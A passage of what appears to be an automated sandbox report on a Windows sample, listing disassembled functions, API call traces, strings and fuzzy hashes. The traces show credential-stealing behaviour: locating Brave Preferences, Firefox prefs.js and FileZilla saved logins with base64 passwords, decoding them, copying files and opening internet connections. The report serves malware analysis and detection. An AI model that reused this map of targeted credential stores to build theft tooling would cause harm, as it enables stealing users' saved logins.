                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDFA5
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CDFB1
                                • lstrlen.KERNEL32(00F18C30), ref: 006CDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDFF4
                                • lstrlen.KERNEL32(006F1794), ref: 006CDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE022
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006CE02E
                                • lstrlen.KERNEL32(00F18950), ref: 006CE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 006CE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 006CE0E7
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CE11F
                                • lstrlen.KERNEL32(00F1EFF0), ref: 006CE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE155
                                • lstrcat.KERNEL32(00000000,?), ref: 006CE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE19F
                                • lstrcat.KERNEL32(00000000), ref: 006CE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006CE1F9
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CE22F
                                • lstrlen.KERNEL32(00F18A10), ref: 006CE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006CE261
                                • lstrcat.KERNEL32(00000000,00F18A10), ref: 006CE269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006CE988
                                • FindClose.KERNEL32(00000000), ref: 006CE997
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: cdddc54160345b06139f00274dfdbe978e3464277b9e4ec8f18a6db6eb174d5d
                                • Instruction ID: fd190c4aba28ea354d8fe38ed5885d635fe7c597200d0f66034cb7b5d4d945ae
                                • Opcode Fuzzy Hash: cdddc54160345b06139f00274dfdbe978e3464277b9e4ec8f18a6db6eb174d5d
                                • Instruction Fuzzy Hash: 4A521571A1160A9BCB61AFB6D899FBE77BAFF44300F04452CE84A97251DF34E941CB90
                                Function 006C60D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C60FF
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C6152
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C6185
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C61B5
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C61F0
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C6223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006C6233
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 082e3f902a7650f12c77f27113814976a89a5f0571479c3cc56ae4ab317c5cc2
                                • Instruction ID: 39fde775b20f7454f6b33093a97c52d0147716b879202baaea45288d522e3810
                                • Opcode Fuzzy Hash: 082e3f902a7650f12c77f27113814976a89a5f0571479c3cc56ae4ab317c5cc2
                                • Instruction Fuzzy Hash: 765216719116169BDB61ABB5DC49FBE77BAEF44300F14802CF909AB251DB34ED02CB98
                                Function 006D6B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6B9D
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6BCD
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6BFD
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 006D6C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006D6C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 006D6C5A
                                • lstrlen.KERNEL32(00000000), ref: 006D6C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 006D6CE2
                                • lstrlen.KERNEL32(00000000), ref: 006D6CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 006D6D6A
                                • lstrlen.KERNEL32(00000000), ref: 006D6D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006D6DF2
                                • lstrlen.KERNEL32(00000000), ref: 006D6E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006D6E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 006D6EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 006D6EC9
                                • LocalFree.KERNEL32(00000000), ref: 006D6ED4
                                • lstrlen.KERNEL32(?), ref: 006D6F6E
                                • lstrlen.KERNEL32(?), ref: 006D6F81
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: 7eb83a423dbeb9ad5dd43264a20676b32ca97de069fbba9cdd3bc28d79b461cf
                                • Instruction ID: ef407afa0b58ad00a951ebc9680b4dc8a0e8f82b8d8a76c9dc78f24c920b5d0b
                                • Opcode Fuzzy Hash: 7eb83a423dbeb9ad5dd43264a20676b32ca97de069fbba9cdd3bc28d79b461cf
                                • Instruction Fuzzy Hash: D3024570A11616ABCB21ABB5DC59FBEBABAEF44710F044419F84AE7351DF34D901CBA0
                                Function 006D4B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D4B7F
                                • lstrlen.KERNEL32(006F4CA8), ref: 006D4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4BA7
                                • lstrcat.KERNEL32(00000000,006F4CA8), ref: 006D4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D4BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: d8d78aa6d83db9f860dc0cb071cedfad55568c080946dda2bbbd9394ad3db5c3
                                • Instruction ID: 5e80500c16f78e406732d700018e605a32b8229992d7b314d84dac3b171fed27
                                • Opcode Fuzzy Hash: d8d78aa6d83db9f860dc0cb071cedfad55568c080946dda2bbbd9394ad3db5c3
                                • Instruction Fuzzy Hash: A9923170E016028FDB24DF29D948BA9B7E6BF44314F19806EE84ADB761DB35DC42CB54
                                Function 006D1250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D12BF
                                • lstrlen.KERNEL32(006F4CA8), ref: 006D12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D12E7
                                • lstrcat.KERNEL32(00000000,006F4CA8), ref: 006D12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D133A
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006D135C
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006D1376
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D13E2
                                • lstrlen.KERNEL32(006F1794), ref: 006D13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D140A
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1416
                                • lstrlen.KERNEL32(?), ref: 006D1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1443
                                • lstrcat.KERNEL32(00000000,?), ref: 006D1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D147A
                                • StrCmpCA.SHLWAPI(?,00F1F008), ref: 006D14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1535
                                • StrCmpCA.SHLWAPI(?,00F1F3A0), ref: 006D1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D15E4
                                • StrCmpCA.SHLWAPI(?,00F1EFC0), ref: 006D1602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1633
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D1685
                                • StrCmpCA.SHLWAPI(?,00F1F080), ref: 006D16B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D16F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1745
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006D181C
                                • FindClose.KERNEL32(00000000), ref: 006D182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 24ac5f69c58a640aa782b8d8abd57172439952a5e4e1facb16e79aa59367c452
                                • Instruction ID: 39dc79513f0dda1833b270b3594ee781180a9d4ea87e58b9e332170cb1029634
                                • Opcode Fuzzy Hash: 24ac5f69c58a640aa782b8d8abd57172439952a5e4e1facb16e79aa59367c452
                                • Instruction Fuzzy Hash: 91124771A10606ABDB20AF79D899EBE77BAAF45300F04452DE88ADB350DF74DC45CB90
                                Function 006DCBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 006DCBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 006DCC13
                                • lstrcat.KERNEL32(?,?), ref: 006DCC5F
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006DCC71
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006DCC8B
                                • wsprintfA.USER32 ref: 006DCCB0
                                • PathMatchSpecA.SHLWAPI(?,00F18A50), ref: 006DCCE2
                                • CoInitialize.OLE32(00000000), ref: 006DCCEE
                                  • Part of subcall function 006DCAE0: CoCreateInstance.COMBASE(006EB110,00000000,00000001,006EB100,?), ref: 006DCB06
                                  • Part of subcall function 006DCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 006DCB46
                                  • Part of subcall function 006DCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 006DCBC9
                                • CoUninitialize.COMBASE ref: 006DCD09
                                • lstrcat.KERNEL32(?,?), ref: 006DCD2E
                                • lstrlen.KERNEL32(?), ref: 006DCD3B
                                • StrCmpCA.SHLWAPI(?,006ECFEC), ref: 006DCD55
                                • wsprintfA.USER32 ref: 006DCD7D
                                • wsprintfA.USER32 ref: 006DCD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 006DCDB0
                                • wsprintfA.USER32 ref: 006DCDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006DCDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 006DCE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 006DCE28
                                • CloseHandle.KERNEL32(00000000), ref: 006DCE33
                                • CloseHandle.KERNEL32(00000000), ref: 006DCE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006DCE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DCE94
                                • FindNextFileA.KERNEL32(?,?), ref: 006DCF8D
                                • FindClose.KERNEL32(?), ref: 006DCF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: f096472c2d1ddd1ede2a0fd65db8cbdeab7cc4ff075bb91b9eeb8b2dccc16c74
                                • Instruction ID: 6efedbaa97f4f606c4289650b765a94453cb35814b9d800440eeddff1452fd23
                                • Opcode Fuzzy Hash: f096472c2d1ddd1ede2a0fd65db8cbdeab7cc4ff075bb91b9eeb8b2dccc16c74
                                • Instruction Fuzzy Hash: F8C13FB1910219AFDB60DF64DC49FEE777AFF88310F144599F909A7290EE30AA85CB50
                                Function 006D1269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D12BF
                                • lstrlen.KERNEL32(006F4CA8), ref: 006D12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D12E7
                                • lstrcat.KERNEL32(00000000,006F4CA8), ref: 006D12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D133A
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006D135C
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006D1376
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D13E2
                                • lstrlen.KERNEL32(006F1794), ref: 006D13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D140A
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1416
                                • lstrlen.KERNEL32(?), ref: 006D1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1443
                                • lstrcat.KERNEL32(00000000,?), ref: 006D1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D147A
                                • StrCmpCA.SHLWAPI(?,00F1F008), ref: 006D14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1535
                                • StrCmpCA.SHLWAPI(?,00F1F3A0), ref: 006D1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D15E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006D181C
                                • FindClose.KERNEL32(00000000), ref: 006D182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
